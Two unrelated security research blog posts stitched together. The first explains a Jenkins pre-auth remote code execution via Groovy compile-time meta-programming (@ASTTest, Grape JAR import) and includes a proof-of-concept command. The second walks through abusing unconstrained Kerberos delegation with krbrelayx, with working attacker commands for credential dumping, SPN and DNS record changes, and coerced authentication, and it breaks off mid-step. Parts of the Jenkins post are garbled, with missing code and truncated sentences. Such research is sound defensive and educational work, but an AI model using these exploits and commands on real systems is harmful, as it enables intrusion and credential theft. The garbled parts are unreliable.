This is part two of the Hacking Jenkins series! If you have not read part one yet, you can check the following link for some background and to see how vulnerable Jenkins’ dynamic routing is!
As the previous article said, to make use of that vulnerability we wanted to find a code execution bug that could be chained with the ACL bypass into a well-deserved pre-auth remote code execution! But I failed. Because of how dynamic routing works, Jenkins checks the permission again before most dangerous invocations (such as the Script Console)! Although we could bypass the first ACL, we still couldn’t do much 🙁
After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing my notes, I found another way to exploit a gadget that I had failed to exploit before! Part two is the story of that! This is also one of my favorite exploits and is really worth reading 🙂
Vulnerability Analysis
First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally, people choose Jenkins because it provides a powerful Pipeline feature, which makes writing scripts for building, testing and delivering software easier! You can think of Pipeline as a powerful language for controlling Jenkins (in fact, Pipeline is a DSL built with Groovy).
In order to check whether the syntax of user-supplied scripts is correct, Jenkins provides an interface for developers! Think about it: if you were the developer, how would you implement this syntax-checking function? You could write an AST (Abstract Syntax Tree) parser yourself, but that is too tough. So the easiest way is to reuse existing functions and libraries!
As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can handle the Pipeline script without errors, the syntax must be correct! The code fragment here shows how Jenkins validates the Pipeline:
public JSON doCheckScriptCompile(@QueryParameter String value) {
    try {
        CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build();
        new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value);
    } catch (CompilationFailedException x) {
        return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray());
    }
    return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON();
    // Approval requirements are managed by regular stapler form validation (via doCheckScript)
}
Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just AST parsing. Without calling the execute() method, no dangerous invocation will be executed! If you try to parse the following Groovy script, you get nothing 🙁
From a developer’s point of view, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation, so the permission check here is less strict than usual! Without any execute() method, it’s just an AST parser and must be safe! This is what I thought the first time I saw this validation. However, while I was writing the technical blog post, Meta-Programming flashed into my mind!
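As a loose analogy for the "parsing is not executing" intuition above, here is a minimal Python sketch (not Groovy, and not the Jenkins code). It assumes a hypothetical one-line script and uses the standard ast module, which builds a syntax tree without running the code. It illustrates only the developer's assumption, not the bypass discussed later.

```python
import ast

# Hypothetical stand-in for a user-supplied script; the file name is made up.
SOURCE = "open('pwned_marker.txt', 'w').close()"


def list_calls(source: str) -> list:
    """Parse source into an AST and return its call nodes without running it."""
    tree = ast.parse(source)
    return [node for node in ast.walk(tree) if isinstance(node, ast.Call)]


calls = list_calls(SOURCE)
print(len(calls), "call nodes found; the script itself was never run")
```

The parser sees the calls to open() and close() as tree nodes only, so no file is created.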
What is Meta-Programming
Meta-Programming is a programming concept! The idea of Meta-Programming is to provide an abstraction layer that lets programmers think about the program in a different way, and makes the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both a program processing itself and programs that operate on other programs (compilers, interpreters, preprocessors…) count as Meta-Programming! The philosophy here is very profound and could even be a big subject in the study of programming languages!
If it is still hard to understand, you can just regard eval(...) as another form of Meta-Programming, which lets you operate on the program on the fly. Although it’s a little bit inaccurate, it’s still a good metaphor for understanding! In software engineering, there are also lots of techniques related to Meta-Programming. For example:
C Macro
C++ Template
Java Annotation
Ruby (Ruby is a Meta-Programming friendly language, and there are even books about it)
DSL(Domain Specific Languages, such as Sinatra and Gradle)
When we are talking about Meta-Programming, we classify it into (1)compile-time and (2)run-time Meta-Programming according to the scope. Today, we focus on the compile-time Meta-Programming!
P.S. It’s hard to explain Meta-Programming in a non-native language. If you are interested, here are some materials! Wiki, Ref1, Ref2
P.S. I am not a programming language master. If anything is incorrect or inaccurate, please forgive me <(_ _)>
How to Exploit?
From the previous section we know Jenkins validates Pipeline with parseClass(…), and we learned that Meta-Programming can poke the parser at compile-time! Compiling (or parsing) is hard work with lots of tough problems and hidden features. So, the idea is: is there any side effect we can leverage?
There are many simple cases which have proved Meta-Programming can make the program vulnerable, such as the macro expansion in the C language:
#define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
#define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a
#define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b
#define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c
#define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d
#define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e
__int128 x[]={f,f,f,f,f,f,f,f};
or the compiler resource bomb (a 16GB ELF from just 18 bytes of source):
int main[-1u]={1};
or calculating Fibonacci numbers in the compiler:
template<int n>
struct fib {
    static const int value = fib<n-1>::value + fib<n-2>::value;
};
template<> struct fib<0> { static const int value = 0; };
template<> struct fib<1> { static const int value = 1; };
int main() {
    int a = fib<10>::value; // 55
    int b = fib<20>::value; // 6765
    int c = fib<40>::value; // 102334155
}
From the assembly of the compiled binary, we can confirm the result is calculated at compile-time, not run-time!
For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow!
First Attempt
Back to our exploitation: Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We started reading the official Groovy Meta-Programming manual to look for ways to exploit it. In section 2.1.9, we found the @groovy.transform.ASTTest annotation. Here is its description:
@ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformations gives access to the AST before the Bytecode is produced.
@ASTTest can be placed on any annotable node and requires two parameters:
What! Perform assertions on the AST? Isn’t that what we want? Let’s write a simple Proof-of-Concept in a local environment first:
this.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
def x
''');
$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned
Cool, it works! However, while reproducing this on the remote Jenkins, it shows:
unable to resolve class org.jenkinsci.plugins.workflow.libs.Library
What the hell!!! What’s wrong with that?
With a little digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipeline, Jenkins provides a feature that can import customized libraries into Pipeline! Jenkins loads this library before every executed Pipeline. As a result, the problem becomes the lack of the corresponding library in the classPath at compile-time. That’s why the error unable to resolve class occurs!
How to fix this problem? It’s simple! Just go to the Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! That fixes the problem, and then we can execute arbitrary code without any error! But this is not a good solution, because this plugin is installed along with the Pipeline. It’s lame to ask an administrator to remove the plugin for code execution! We stopped digging in this direction and tried to find another way!
Oh, from the article we know Grape is the built-in JAR dependency manager in Groovy! It helps programmers import libraries that are not in the classPath. The usage looks like:
annotation, it can import the JAR file which is not in classPath during compile-time automatically! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that’s enough. You can follow the PoC provided by @adamyordan to execute arbitrary commands!
However, without a valid credential and the execute() method, this is just an AST parser and you can’t even control files on the remote server. So, what can we do? By diving into more about
Wow, it works! Now, we believe we can make Jenkins import any malicious library by Grape! However, the next problem is, how to get code execution?
The Way to Code Execution
In exploitation, the goal is always to escalate a read primitive or write primitive to code execution! From the previous section, we can write a malicious JAR file onto the remote Jenkins server via Grape. However, the next problem is how to execute code.
void processOtherServices(ClassLoader loader, File f) {
    try {
        ZipFile zf = new ZipFile(f)
        ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
        if (serializedCategoryMethods != null) {
            processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods))
        }
        ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
        if (pluginRunners != null) {
            processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
        }
    } catch(ZipException ignore) {
        // ignore files we can't process, e.g. non-jar/zip artifacts
        // TODO log a warning
    }
}
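The lookup in the Groovy snippet above can be mirrored in a few lines of Python, for example to inspect a downloaded JAR for the same service entries. This is only a sketch: the two entry names are copied from the snippet, while find_grape_service_entries and build_demo_jar are hypothetical helper names introduced for illustration.

```python
import io
import zipfile

# Entry names copied from the Groovy snippet above.
SERVICE_ENTRIES = (
    "META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods",
    "META-INF/services/org.codehaus.groovy.plugins.Runners",
)


def find_grape_service_entries(jar_bytes: bytes) -> dict:
    """Return {entry name: entry text} for the service entries present in a JAR."""
    found = {}
    try:
        with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
            names = set(zf.namelist())
            for entry in SERVICE_ENTRIES:
                if entry in names:
                    found[entry] = zf.read(entry).decode("utf-8", "replace")
    except zipfile.BadZipFile:
        # Mirrors the Groovy code: silently skip anything that is not a ZIP.
        pass
    return found


def build_demo_jar(runner_class: str) -> bytes:
    """Build an in-memory demo JAR holding only a Runners service entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(SERVICE_ENTRIES[1], runner_class + "\n")
    return buf.getvalue()


demo_jar = build_demo_jar("ExampleRunner")  # hypothetical class name
print(find_grape_service_entries(demo_jar))
```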
A JAR file is just a subset of the ZIP format. In processOtherServices(…), Grape registers services if certain entry points are present. Among them, the Runner interests me. By looking into the implementation of processRunners(…), we found this:
With the exploit, we can gain full access to the remote Jenkins server! We use Meta-Programming to import a malicious JAR file at compile-time, and execute arbitrary code through the Runner service! Although there is a built-in Groovy Sandbox (Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is at compile-time, not at run-time!
Because this is an attack vector on Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s assumption that if nothing is executed, there is no problem. It is also an attack vector that requires some computer science knowledge. Otherwise, you would not think of Meta-Programming! That’s what makes this vulnerability interesting. Aside from the entry points doCheckScriptCompile(...) and toJson(...) that I reported, Mikhail Egorov also quickly found another entry point to trigger this vulnerability after it had been fixed!
Apart from that, this vulnerability can also be chained with my previous exploit on Hacking Jenkins Part 1 to bypass the Overall/Read restriction to a well-deserved pre-auth remote code execution. If you fully understand the article, you know how to chain 😛
Thank you for reading this article, and I hope you liked it! This is the end of the Hacking Jenkins series. I will publish more interesting research in the future 🙂
There have been some interesting new developments recently in abusing Kerberos in Active Directory, and after my dive into Kerberos across trusts a few months ago, this post is about a relatively unknown (from an attacker’s perspective), but dangerous feature: unconstrained Kerberos delegation. During the writing of this blog, this became quite a bit more relevant with the discovery of some interesting RPC calls that can get Domain Controllers to authenticate to you, which even allow for compromise across forest boundaries. Then there was the discovery of PrivExchange, which can make Exchange authenticate in a similar way. Because tooling for unconstrained delegation abuse is quite scarce, I wrote a new toolkit, krbrelayx, which can abuse unconstrained delegation and get Ticket Granting Tickets (TGTs) from users connecting to your host. In this blog we will dive deeper into unconstrained delegation abuse and into some more advanced attacks that are possible with the krbrelayx toolkit.
Relaying Kerberos???
Before we start off, let’s clear up a possible confusion: no, you cannot actually relay Kerberos authentication in the way you can relay NTLM authentication. The reason the tool I’m releasing is called krbrelayx is that it works in a way similar to impacket’s ntlmrelayx (and shares quite some parts of the code). Kerberos tickets are partially encrypted with a key based on the password of the service a user is authenticating to, so sending this on to a different service is pointless as they won’t be able to decrypt the ticket (and thus we can’t authenticate). So what does this tool actually do? When Windows authenticates to service or computer accounts that have unconstrained delegation enabled, some interesting stuff happens (which I’ll explain later on) and those accounts end up with a usable TGT. If we (as an attacker) are the ones in control of this account, this TGT can then be used to authenticate to other services. Krbrelayx performs this in a similar way to when you are relaying with ntlmrelayx (with automatic dumping of passwords, obtaining DA privileges, or performing ACL based attacks), hence the similar naming. If you first want to read about what unconstrained delegation is on a high level, I recommend Sean Metcalf’s blog about it.
Attack requirements
To perform this unconstrained delegation attack, a couple of requirements need to be met first:
Control over an account with unconstrained delegation privileges
Permissions to modify the servicePrincipalName attribute of that account (optional)
Permissions to add/modify DNS records (optional)
A way to connect victim users/computers to us
Unconstrained delegation account
The first thing we need is an account that has unconstrained delegation privileges. This means an account that has the TRUSTED_FOR_DELEGATION UserAccountControl flag set. This can be on either a user account or a computer account. Any user in AD can query those accounts, using for example PowerView:
Once we have compromised an account, which means we have obtained the account password or Kerberos keys, we can decrypt Kerberos service tickets used by users authenticating to the service associated with the compromised account. Previous ways to abuse unconstrained delegation involve dumping the cached tickets from LSASS using for example Mimikatz or Rubeus, but this requires executing code on a compromised host. In this blog we’ll avoid doing that, and instead do the whole thing over the network from a host we fully control, without having to worry about endpoint detection or crashing production servers by dumping processes (though this doesn’t apply to Rubeus since it uses native APIs).
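The TRUSTED_FOR_DELEGATION flag mentioned above is a single bit (0x80000) in the userAccountControl attribute. As a minimal sketch, assuming you already have userAccountControl values from an LDAP query of your own, the check and a matching LDAP filter could look like this. The function names are hypothetical, and the filter uses the standard bitwise-AND matching rule OID.

```python
# Bit value of the TRUSTED_FOR_DELEGATION userAccountControl flag.
TRUSTED_FOR_DELEGATION = 0x80000  # 524288

# OID of the LDAP bitwise-AND matching rule supported by Active Directory.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def has_unconstrained_delegation(user_account_control: int) -> bool:
    """Return True if the TRUSTED_FOR_DELEGATION bit is set."""
    return bool(user_account_control & TRUSTED_FOR_DELEGATION)


def delegation_ldap_filter() -> str:
    """Build an LDAP filter matching objects that have the flag set."""
    return "(userAccountControl:%s:=%d)" % (
        LDAP_MATCHING_RULE_BIT_AND,
        TRUSTED_FOR_DELEGATION,
    )


# 532480 = SERVER_TRUST_ACCOUNT (0x2000) | TRUSTED_FOR_DELEGATION (0x80000)
print(has_unconstrained_delegation(532480))
print(delegation_ldap_filter())
```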
For user accounts, passwords can be obtained the typical way, by Kerberoasting, cracking NTLMv1/NTLMv2 authentication, simply guessing weak passwords or dumping them from memory on compromised hosts. Computer accounts are harder to obtain since by default they have very strong randomly generated passwords, and their passwords/keys only reside on the host the account belongs to (or on the DC). When we have Administrator rights on the associated host, it becomes relatively easy since the computer account password is stored in the registry and thus can be obtained via the network with secretsdump.py, or by dumping the secrets with mimikatz lsadump::secrets. Both also support dumping secrets from offline registry hives.
To calculate the Kerberos keys from plaintext passwords, we also need to specify the salt. If you’re familiar with Kerberos, you’ll know that there are different encryption algorithms used. The weakest cipher supported by modern AD installs uses RC4, with a key based on the NTLM hash of the user (not including any salt). The AES-128 and AES-256 ciphers that Windows will pick by default however do include a salt, which we will need to include in the key calculation. The salt to calculate these keys is as follows:
For user accounts, it is the uppercase Kerberos realm name + case sensitive username
For computer accounts, it is the uppercase realm name + the word host + full lowercase hostname
The Kerberos realm name is the fully qualified domain name (FQDN) of the domain (so not the NETBIOS name!), the full hostname is also the FQDN of the host, not just the machine name, and does not include an $. The username used as salt for user accounts is the case-sensitive SAMAccountName (so if the user is called awEsOmEusER1 then awesomeuser1 will not generate the correct key).
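The two salt rules above can be written down as a short Python sketch. The function names are hypothetical and the example realm and host names are only illustrative. This computes the salt string only, not the key derivation itself.

```python
def user_salt(realm_fqdn: str, sam_account_name: str) -> str:
    """Salt for a user account: uppercase realm + case-sensitive username."""
    return realm_fqdn.upper() + sam_account_name


def computer_salt(realm_fqdn: str, host_fqdn: str) -> str:
    """Salt for a computer account: uppercase realm + 'host' + lowercase FQDN.

    host_fqdn is the full hostname without a trailing '$'.
    """
    return realm_fqdn.upper() + "host" + host_fqdn.lower()


print(user_salt("internal.corp", "awEsOmEusER1"))
print(computer_salt("internal.corp", "ICORP-W10.internal.corp"))
```

Note that user_salt deliberately leaves the username untouched, since changing its case would yield a different key.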
For computer accounts, I’ve added functionality to secretsdump.py which will automatically dump the machine Kerberos keys if you run it against a host (you will need at least impacket 0.9.18 or run the latest development version from git). If it can’t figure out the correct salt for some reason, you can specify this yourself to krbrelayx.py with the --krbpass or --krbhexpass (for hex encoded binary computer account passwords) and --krbsalt parameters. As a sidenote, this took me way longer than expected to implement since computer account passwords are random binary in UTF-16-LE, but Kerberos uses UTF-8 input for key derivation. The UTF-16 bytes are however not valid unicode, which makes Python not too happy when you try to convert this to UTF-8. It took me a while to figure out that Microsoft implementations actually implicitly replace all invalid unicode characters when performing the conversion to UTF-8 for Kerberos keys. After telling Python to do the same, the keys started matching with those on my DC ¯\_(ツ)_/¯.
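The conversion described above can be sketched with Python's built-in codecs and the "replace" error handler. This is a minimal illustration of the idea, not the exact code in krbrelayx or impacket; the function name and the sample bytes are made up.

```python
def machine_password_to_kerberos_input(raw_utf16le: bytes) -> bytes:
    """Convert a binary UTF-16-LE machine password to UTF-8 for key derivation.

    Invalid UTF-16 sequences are replaced (with U+FFFD) instead of raising,
    following the replacement behaviour described in the text.
    """
    text = raw_utf16le.decode("utf-16-le", errors="replace")
    return text.encode("utf-8", errors="replace")


# Made-up sample: an unpaired high surrogate (0xD800) followed by the letter 'a'.
sample = b"\x00\xd8" + "a".encode("utf-16-le")
print(machine_password_to_kerberos_input(sample))
```

A strict decode of the same bytes raises UnicodeDecodeError, which is the "Python not too happy" situation mentioned above.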
Control over ServicePrincipalName attribute of the unconstrained delegation account
After having obtained the Kerberos keys of the compromised account we can decrypt the tickets, but we haven’t discussed yet how to actually get hosts to authenticate to us using Kerberos. When a user or computer wants to authenticate with Kerberos to the host somehost.corp.com over SMB, Windows will send a request for a service ticket to the Domain Controller. This request will include the Service Principal Name (SPN), made up from the protocol and the host which the service is on. In this example this would be cifs/somehost.corp.com. The Domain Controller performs a lookup in the directory which account (if any) has this ServicePrincipalName assigned, and then uses the Kerberos keys associated with that account to encrypt the service ticket (I’m skipping on the technical details for now, you can find those in a later paragraph).
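The SPN lookup described above can be modelled as a toy Python sketch. Everything here is hypothetical and greatly simplified: ToyDirectory stands in for the directory, lookups are lowercased as a simplification, and no real Kerberos encryption takes place. The point is only that whichever account owns the SPN is the account whose keys protect the ticket.

```python
def build_spn(service_class: str, hostname: str) -> str:
    """Compose an SPN from the protocol (service class) and the host."""
    return "%s/%s" % (service_class, hostname)


class ToyDirectory:
    """Toy stand-in for the directory: maps SPNs to the owning account."""

    def __init__(self):
        self._spn_to_account = {}

    def register(self, account: str, spn: str) -> None:
        self._spn_to_account[spn.lower()] = account

    def account_for(self, spn: str):
        """Return the account whose keys would encrypt a ticket for this SPN."""
        return self._spn_to_account.get(spn.lower())


directory = ToyDirectory()
directory.register("SOMEHOST$", build_spn("cifs", "somehost.corp.com"))

print(directory.account_for("cifs/somehost.corp.com"))
print(directory.account_for("cifs/attacker.corp.com"))  # None: SPN not registered
```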
To make sure that victims authenticate to the account with unconstrained delegation and that we can decrypt the tickets, we need to make sure to send their traffic to a hostname of which the SPN is associated with the account we are impersonating. If we have the hostname attacker.corp.com and that SPN is not registered to the right account, the attack won’t work. The easiest way to do this is if we have control over an account that has privileges to edit attributes of the computer or user account that we compromised, in which case we can just add the SPN to that account using the addspn.py utility that is included with krbrelayx:
user@localhost:~/adtools$ python addspn.py -u testsegment\\backupadmin -s host/testme.testsegment.local -t w10-outlook.testsegment.local ldap://s2016dc.testsegment.local
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
If we don’t have those privileges, it is a bit more complicated, and for user accounts I haven’t found a way to modify the SPNs without having those rights assigned. Computer accounts can by default add their own SPNs via the “Validated write to servicePrincipalName” right, but they can only write SPNs that match their full hostname or SAMAccountName. This would seem like a dead end, but there is a way around this! There is an additional validated write right, which allows computers to update their own msDS-AdditionalDnsHostName property, which got introduced in Server 2012 and contains additional hostnames for a computer object. According to the documentation, this validated write allows us to add any hostname which has the FQDN of the domain that we are in as a suffix, as long as we have the Validated-MS-DS-Additional-DNS-Host-Name validated write right. This right is not assigned by default:
While playing with this property however, it turned out that the Validated-MS-DS-Additional-DNS-Host-Name validated write right isn’t actually needed to update the msDS-AdditionalDnsHostName property. The “Validated write to DNS host name”, which is enabled for computer objects by default, does also allow us to write to the msDS-AdditionalDnsHostName property, and allows us to assign any hostname within the current domain to the computer object, for which SPNs will then automatically be added. With this trick it is possible to add an SPN to our account that we can point to a hostname that is under the control of an attacker:
user@localhost:~/adtools$ python addspn.py -u testsegment\\w10-outlook\$ -p aad3b435b51404eeaad3b435b51404ee:7a99efdea0e03b94db2e54c85911af47 -s testme.testsegment.local s2016dc.testsegment.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
user@localhost:~/adtools$ python addspn.py -u testsegment\\w10-outlook\$ -p aad3b435b51404eeaad3b435b51404ee:7a99efdea0e03b94db2e54c85911af47 s2016dc.testsegment.local -q
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=W10-OUTLOOK,CN=Computers,DC=testsegment,DC=local - STATUS: Read - READ TIME: 2018-11-18T20:44:33.730958
dNSHostName: W10-OUTLOOK.testsegment.local
msDS-AdditionalDnsHostName: TESTME$
testme.testsegment.local
sAMAccountName: W10-OUTLOOK$
servicePrincipalName: TERMSRV/TESTME
TERMSRV/testme.testsegment.local
WSMAN/TESTME
WSMAN/testme.testsegment.local
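The suffix rule described above for msDS-AdditionalDnsHostName (the hostname must have the domain FQDN as a suffix) can be sketched as a simple Python check. This models only the rule as stated in the text. The function name is hypothetical and the real validation performed by the Domain Controller may differ in detail.

```python
def allowed_additional_hostname(hostname: str, domain_fqdn: str) -> bool:
    """Return True if hostname is a name inside domain_fqdn (suffix rule only)."""
    host = hostname.lower().rstrip(".")
    domain = domain_fqdn.lower().rstrip(".")
    # Require a label boundary so 'eviltestsegment.local' does not match,
    # and at least one character in front of the domain suffix.
    return host.endswith("." + domain) and len(host) > len(domain) + 1


print(allowed_additional_hostname("testme.testsegment.local", "testsegment.local"))
print(allowed_additional_hostname("testme.other.local", "testsegment.local"))
```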
If for whatever reason we can’t modify the SPN to a hostname under the attacker’s control, we can always hijack the current SPN by modifying the DNS record or using our favorite spoofing/mitm attack, though this will break connectivity to the host, which I wouldn’t recommend in production environments.
Permissions to add/modify DNS records
After adding a new SPN that points to a hostname not in use on the network, we of course need to make sure the hostname we added resolves to our own IP. If the network you are in uses Active Directory-Integrated DNS, this should be straightforward. As Kevin Robertson described in his blog about ADIDNS, by default any authenticated user can create new DNS records, as long as there is no record yet for the hostname. So after we add the SPN for attacker.corp.com to our unconstrained delegation account, we can add a record for this hostname that points to our IP using for example PowerMad (different hostname used as example):
I also added a tool to the krbrelayx repo that can perform DNS modifications (dnstool.py) in AD over LDAP:
user@localhost:~/adtools$ python dnsparse.py -u icorp\\testuser icorp-dc.internal.corp -r attacker -a add -d 10.1.1.2
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Afterwards we can see the record exists in DNS:
user@localhost:~/adtools$ python dnsparse.py -u icorp\\testuser icorp-dc.internal.corp -r attacker -a query
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record attacker
DC=attacker,DC=internal.corp,CN=MicrosoftDNS,DC=DomainDnsZones,DC=internal,DC=corp
[+] Record entry:
- Type: 1 (A) (Serial: 36)
- Address: 10.1.1.2
And the record resolves after the DNS server refreshes the records from LDAP (which by default takes place every 180 seconds):
The dnstool.py utility has several other options, including one to remove records again after exploitation, which I won’t go into in this post, but you can get the tool on GitHub. If modifying DNS does not work or the network you are in does not use AD for DNS, it is always possible to perform network attacks to take over the DNS server, though this often requires you to be in the same VLAN as the system. A way which should always work is modifying the compromised computer’s own DNS record, but this is almost guaranteed to break stuff and might take a while to propagate because of DNS caching.
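Since a new record only resolves after the DNS server refreshes its records from LDAP (every 180 seconds by default, as noted above), it can be convenient to poll until the name resolves to the expected address. The following is a minimal Python sketch of such a wait loop. It is not part of krbrelayx; the function name and its parameters are hypothetical. The resolver is injectable so the logic can be exercised without touching the network.

```python
import socket
import time


def wait_for_record(hostname, expected_ip, resolver=socket.gethostbyname,
                    attempts=20, delay=10.0, sleep=time.sleep):
    """Poll until hostname resolves to expected_ip; return True on success."""
    for attempt in range(attempts):
        try:
            if resolver(hostname) == expected_ip:
                return True
        except OSError:
            # socket.gaierror (name not found yet) is a subclass of OSError.
            pass
        if attempt < attempts - 1:
            sleep(delay)
    return False


# Example (not executed here, needs the lab DNS server as system resolver):
# wait_for_record("attacker.internal.corp", "10.1.1.2")
```

With the defaults of 20 attempts and a 10 second delay, the loop covers a little more than one 180 second refresh interval.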
Obtaining traffic
There are a multitude of ways to obtain traffic from users to the attacker’s host. Any technique described online for gathering NTLM authentication will also work for getting users to authenticate to your rogue SMB or HTTP server. Some options are:
Phishing sites with a UNC path or redirect
Using responder, Inveigh or metasploit to reply to LLMNR/NBNS requests
Placing files with an icon linking to a UNC path on a popular file share within the network
Etc
Two very effective ways to obtain Domain Admin (equivalent) privileges via unconstrained delegation at the time of writing rely on bugs that require only regular user credentials to make a high-value target connect to you. At this point, two important examples are known:
SpoolService bug: There is a Remote Procedure Call in the MS-RPRN protocol which causes remote computers to authenticate to arbitrary hosts via SMB. This was discovered by Lee Christensen aka @tifkin_ and called the “printer bug”. Harmj0y recently did a writeup on abusing this bug as well to perform unconstrained delegation attacks over forest trusts in his blog. The MS-RPRN protocol was also implemented in impacket by @agsolino, and of course I couldn’t resist writing a small utility for it as part of the krbrelayx toolkit, called printerbug.py, which triggers the backconnect.
PrivExchange: The Exchange Web Services (EWS) SOAP API exposes a method that subscribes to push notifications. This method can be called by any user with a mailbox and will make Exchange connect to any host we specify via HTTP. When requested, Exchange will (unless it is patched with the latest CU) authenticate with the computer account of the system Exchange is running on. This computer account has high privileges in the domain by default. I wrote about this in my previous blog and the privexchange.py tool is available here. Apart from NTLM relaying this authentication to LDAP, we can also use unconstrained delegation to obtain Exchange’s TGT and use that to perform an ACL based privilege escalation.
Use case 1: Gaining DC Sync privileges using a computer account and the SpoolService bug
In the first case we will abuse the unconstrained delegation privileges of a computer account in my internal.corp lab domain. We have obtained administrative privileges on this host by compromising the user testuser, which is a member of the Administrators group on this host. We will follow the steps outlined above, and first obtain the Kerberos keys and NTLM hashes:
Password:
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x38f3153a77837cf2c5d04b049727a771
...cut...
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ICORP\ICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
ICORP\ICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd
ICORP\ICORP-W10$:des-cbc-md5:91abd073c7a8e534
ICORP\ICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6:::
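To feed the AES256 key into later steps, the Kerberos key lines in the output above can be picked out with a small parser. This is a sketch that assumes the account:etype:key line layout shown in this output. The function name is hypothetical and the sample text is copied from the dump above.

```python
KERBEROS_ETYPES = {
    "aes256-cts-hmac-sha1-96",
    "aes128-cts-hmac-sha1-96",
    "des-cbc-md5",
}


def parse_kerberos_keys(output: str) -> dict:
    """Return {account: {etype: hex key}} from 'account:etype:key' lines."""
    keys = {}
    for line in output.splitlines():
        parts = line.strip().split(":")
        # Kerberos key lines have exactly three fields; NTLM lines have more.
        if len(parts) == 3 and parts[1] in KERBEROS_ETYPES:
            account, etype, key = parts
            keys.setdefault(account, {})[etype] = key
    return keys


SAMPLE = r"""
[*] $MACHINE.ACC
ICORP\ICORP-W10$:aes256-cts-hmac-sha1-96:9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab
ICORP\ICORP-W10$:aes128-cts-hmac-sha1-96:a6e34ed07f7bffba151fedee4d6640fd
ICORP\ICORP-W10$:des-cbc-md5:91abd073c7a8e534
ICORP\ICORP-W10$:aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6:::
"""

machine_keys = parse_kerberos_keys(SAMPLE)
print(machine_keys[r"ICORP\ICORP-W10$"]["aes256-cts-hmac-sha1-96"])
```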
Now we add the SPN. We use the NTLM hash that we just dumped to authenticate as the machine account, which can modify its own SPN, but only via the
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute
user@localhost:~/krbrelayx$ python addspn.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/attacker.internal.corp icorp-dc.internal.corp --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
The SPN for attacker.internal.corp now exists on the victim account, but the DNS entry for it does not yet exist. We use the dnstool.py utility to add the record, pointing to the attacker IP:
user@localhost:~/krbrelayx$ python dnstool.py -u icorp\\icorp-w10\$ -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r attacker.internal.corp -d 192.168.111.87 --action add icorp-dc.internal.corp
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
user@localhost:~/krbrelayx$ nslookup attacker.internal.corp 192.168.111.2
